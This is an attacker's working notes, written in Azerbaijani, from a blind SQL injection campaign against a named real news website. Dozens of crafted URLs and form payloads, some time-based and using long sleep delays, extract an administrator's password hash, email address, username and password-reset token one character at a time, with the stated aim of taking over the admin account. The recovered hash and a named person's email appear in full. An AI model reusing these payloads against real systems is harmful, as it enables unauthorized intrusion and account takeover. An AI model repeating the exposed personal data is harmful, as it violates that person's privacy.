http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,12,1%29=%27a%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

==================================================================
13-cu simvol: g

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,13,1%29=%27g%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

==================================================================

14-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,14,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

==================================================================

15-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,15,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279
==================================================================
16-ci simvol: +

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,16,1%29=%27+%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

==================================================================
Ne ise sikdirecek bu table lazim deyil imho bu bize.

Esas o authors table-ini yoxlayaq.













=====================================================================

1-ci simvol: b

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,1,1%29=%27b%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
2-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,2,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
3-cu simvol: 0
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,3,1%29=%270%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=====================================================================

4-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,4,1%29=%27e%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

5-ci simvol: 5

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,5,1%29=%275%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
6-ci simvol: 4

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,6,1%29=%274%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=====================================================================

7-ci simvol: f
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,7,1%29=%27f%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

8--ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,8,1%29=%27e%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279



=====================================================================

9-cu simvol: 7

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,9,1%29=%277%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

10-cu simvol: f

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,10,1%29=%27f%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

11-ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,11,1%29=%27e%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

12-ci simvol: 1

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,12,1%29=%271%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=====================================================================
13-cu simvol: c

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,13,1%29=%27c%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=====================================================================

14-cu simvol: 6

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,14,1%29=%276%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

15-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,15,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

16-ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,16,1%29=%27e%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

17-ci simvol: 7

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,17,1%29=%277%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

18-ci simvol: 9

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,18,1%29=%279%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
19-cu simvol: 7

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,19,1%29=%277%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

20-ci simvol: 0

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,20,1%29=%270%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

21-ci simvol: f

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,21,1%29=%27f%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

22-ci simvol: d

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,22,1%29=%27d%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
23-cu simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,23,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

24-cu simvol: 2

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,24,1%29=%272%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=====================================================================

25-ci simvol: 0

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,25,1%29=%270%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
26-ci simvol: 7

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,26,1%29=%277%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

27-ci simvol: c

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,27,1%29=%27c%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
28-ci simvol: 4

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,28,1%29=%274%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

29-cu simvol: 2

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,29,1%29=%272%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

30-cu simvol: 9

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,30,1%29=%279%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

31-ci simvol: 3

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,31,1%29=%273%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
32-ci simvol: c

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,32,1%29=%27c%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

33-cu simvol: f

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,33,1%29=%27f%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

34-cu simvol: 1

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,34,1%29=%271%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
35-ci simvol: d

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,35,1%29=%27d%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

36-ci simvol: 7

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,36,1%29=%277%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
37-ci simvol: 1

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,37,1%29=%271%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

38-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,38,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================
39-cu simvol: 3

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,39,1%29=%273%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

40-ci simvol: d

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,40,1%29=%27d%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=====================================================================

Uf beeeeeeeeeee belim qirildi bunu cekib qurtarana qeder))






ba0e54fe7fe1c6ae7970fda207c4293cf1d71a3d







mysql> select length('ba0e54fe7fe1c6ae7970fda207c4293cf1d71a3d') \g
+----------------------------------------------------+
| length('ba0e54fe7fe1c6ae7970fda207c4293cf1d71a3d') |
+----------------------------------------------------+
| 40 |
+----------------------------------------------------+
1 row in set (0.02 sec)




Zerger deqiqliyi basqa seydire))))))))))

//TRUE

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60password%60,1,42%29=%27ba0e54fe7fe1c6ae7970fda207c4293cf1d71a3d%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279






Qirilmir sikilmis:(



99% ehtimalki ele bu skriptdir: http://code.sourcefabric.org/rdiff/newscoop?csid=7ec47f25cf212346b18519bb94598313c9b576fc&u&N

pass saltsizdir.

03.12.2012




------------------------ NEW ATTACK -----------------------

EMAIL CEKEK:

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,1,1%29=%27k%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

1-ci simvol: k


=============================================================
2-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,2,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

3-cu simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,3,1%29=%27r%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

4-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,4,1%29=%27e%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================

5-ci simvol: n

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,5,1%29=%27n%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279



=============================================================
6c-si simvol:
TAPA BILMEDIM BUNU!!!!!!!!


=============================================================


AY varyoxsuzlar!
24 simvollu email adres:

//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28%60EMail%60%29=%2724%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================
7-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,7,1%29=%27s%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=============================================================
8-ci simvol: a
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,8,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================
9-cu simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,9,1%29=%27r%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================

10-cu simvol: g


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,10,1%29=%27g%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

11-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,11,1%29=%27s%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================
12-ci simvol: y

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,12,1%29=%27y%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

13-cu simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,13,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

14-cu simvol: n

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,14,1%29=%27n%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279



=============================================================


15-ci simvol: @

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,15,1%29=%27@%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279
=============================================================

16-ci simvol: g

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,16,1%29=%27g%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

17-ci simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,17,1%29=%27m%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================

18-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,18,1%29=%27a%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================

19-cu simvol: i

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,19,1%29=%27i%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================

20-ci simvol: l

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,20,1%29=%27l%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================
21-ci simvol: .

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,21,1%29=%27.%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================
22-ci simvolu: c

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,22,1%29=%27c%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279

=============================================================

23-cu simvol: o

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,23,1%29=%27o%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================
24-cu simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,24,1%29=%27m%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


=============================================================



karen.sargsyan@gmail.com


Ela)
//TRUE

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60EMail%60,1,30%29=0x6B6172656E2E736172677379616E40676D61696C2E636F6D,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279



mysql> select hex('karen.sargsyan@gmail.com') \g
+--------------------------------------------------+
| hex('karen.sargsyan@gmail.com') |
+--------------------------------------------------+
| 6B6172656E2E736172677379616E40676D61696C2E636F6D |
+--------------------------------------------------+
1 row in set (0.03 sec)

mysql>






username: admin
//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28%60UName%60,1,10%29=%27admin%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


Baslamaq olar artiq.


username: admin
email: karen.sargsyan@gmail.com
token-i cekib yeni pass yaradib girmeliyik artiq.








mysql> select 5*3600 \g
+--------+
| 5*3600 |
+--------+
| 18000 |
+--------+
1 row in set (0.03 sec)


Kifayet elemelidir 5 saatliq sleep o vaxta cekmeliyik tokeni.




sleep(18000)





Yeni tokeni yaradiriq:

1-CI PAYLOAD:

karen.sargsyan@gmail.com'-- and 9!='9karen.sargsyan@gmail.com



TRIGGERED:

karen.sargsyan@gmail.com' limit 1-- and 9!='9karen.sargsyan@gmail.com



Stage 2:

Artiq yaratdiq tokeni:


//TRUE

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(length(password_reset_token)='50',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password





Getdik tez tokeni cekmeye:


===============================================

1-ci simvolu: f


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,1,1)='f',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================


2-ci simvolu: 3

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,2,1)='3',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================


3-cu simvolu: 6

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,3,1)='6',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

4-ci simvol: b


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,4,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

5-ci simvolu: a

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,5,1)='a',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

6-ci simvolu: a


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,6,1)='a',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

7-ci simvol: f

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,7,1)='f',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

8-ci simvol: c

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,8,1)='c',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

9-cu simvol: 1

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,9,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

10-cu simvol: 3

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,10,1)='3',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

11-ci simvol: c

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,11,1)='c',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

12-ci simvol: 4


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,12,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
13-cu simvol: b

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,13,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
14-cu simvol: e

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,14,1)='e',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

15-ci simvol: 1

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

16-ci simvol: 6


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,16,1)='6',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
17-ci simvol: 9


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,17,1)='9',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
18-ci simvol: 0

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,18,1)='0',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

19-cu simvol: b


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,19,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
20-ci simvol: d

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,20,1)='d',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
21-ci simvol: 8


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,21,1)='8',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
22-ci simvol: e


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,22,1)='e',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

23-cu simvol: 4

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,23,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

24-cu simvol: d


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,24,1)='d',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================


25-ci simvol: e

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,25,1)='e',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================
26-ci simvol: e

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,26,1)='e',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

27-ci simvol: b


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,27,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
28-ci simvol: 4


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,28,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================
29-cu simvol: 3

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,29,1)='3',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
30-cu simvol: 1


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,30,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
31-ci simvol: 4


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,31,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

32-ci simvol: 8


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,32,1)='8',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



===============================================

33-cu simvol: 6

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,33,1)='6',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



===============================================

34-cu simvol: 5

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,34,1)='5',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



===============================================


35-ci simvol: d


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,35,1)='d',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password




===============================================

36-ci simvol: e


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,36,1)='e',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================


37-ci simvol: b


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,37,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================
38-ci simvol: b


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,38,1)='b',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



===============================================


39-cu simvol: c


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,39,1)='c',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
40-ci simvol: f


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,40,1)='f',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
41-ci simvol: 1


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,41,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
42-ci simvol: 3


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,42,1)='3',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================
43-cu simvol: 5


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,43,1)='5',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

===============================================

44-cu simvol: 4

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,44,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

45-ci simvol: 5


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,45,1)='5',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



===============================================

46-ci simvol: 4


f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,46,1)='4',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

47-ci simvol: 5

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,47,1)='5',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password


===============================================

48-ci simvol: 7


